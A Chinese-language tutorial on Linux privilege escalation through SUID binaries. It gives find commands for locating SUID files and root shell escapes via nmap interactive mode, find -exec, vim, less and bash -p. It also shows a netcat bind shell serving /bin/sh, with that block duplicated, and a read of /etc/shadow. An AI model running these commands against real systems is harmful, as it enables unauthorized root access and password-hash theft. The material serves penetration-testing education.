Linux提权————利用SUID提权-摩杜云开发者社区

前言

今天给大家带来的是linux下的提权技巧。

SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。

已知的可用来提权的linux可行性的文件列表如下：

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说，命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

Linux提权————利用SUID提权_bash

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

Linux提权————利用SUID提权_root权限_02

较旧版本的Nmap（2.02至5.21）具有交互模式，允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中，因此可以使用交互式控制台来运行具有相同权限的shell。

Linux提权————利用SUID提权_二进制文件_03

交互模式可以通过执行Nmap参数" interactive "

nmap --interactive

Linux提权————利用SUID提权_bash_04

以下命令将提供一个提升的shell。

nmap> !sh
sh-3.2# whoami
root

Linux提权————利用SUID提权_bash_05

也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。

exploit/unix/local/setuid_nmap

如果Find命令也是以Suid权限运行的话，则将通过find执行的所有命令都会以root权限执行。

touch pentestlab
find pentestlab -exec whoami \;

Linux提权————利用SUID提权_二进制文件_06

大部分Linux操作系统都安装了netcat，因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Linux提权————利用SUID提权_bash_07

大部分Linux操作系统都安装了netcat，因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Linux提权————利用SUID提权_二进制文件_08

连接上去就会直接获取到一个Root权限的shell。

netcat 192.168.1.189 5555
id
cat /etc/shadow

Linux提权————利用SUID提权_root权限_09

Vim是Linux环境下的一款文件编辑器。但是，如果以SUID运行的话，它会继承root用户的权限，因此可以读取系统上的所有文件。

vim.tiny /etc/shadow

Linux提权————利用SUID提权_root权限_10

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

以下命令将以root权限打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(serv

Linux提权————利用SUID提权_root权限_11

Less和More都执行以用来提权。

less /etc/passwd
!/bin/sh

Linux提权————利用SUID提权_bash_12

获取到Root权限

最近在做一些威胁情报分析，apt攻击源分析中，发现了一个很好的平台，给大家推荐一下。

平台地址：http://www.vxcube.com